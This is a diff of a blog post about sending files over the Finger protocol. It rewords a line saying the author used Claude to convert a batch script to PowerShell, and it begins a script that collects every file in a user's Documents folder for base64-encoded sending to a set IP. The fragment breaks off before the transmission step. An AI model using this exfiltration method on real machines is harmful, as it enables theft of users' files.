mennovanveenendaal/mennovanveenendaal.github.io/_posts/2026/2026-06-03-Sending files using Finger.md

 ## Redesign

-I used Claude to convert the batch script into a PowerShell script.
+Using Claude I converted the batch script into a PowerShell script.
 This script encodes each payload with base64 to send a single argument.

 ```shell
 $ip = "10.1.123.123"
 $files = Get-ChildItem "C:\Users\vboxuser\Documents\files\*"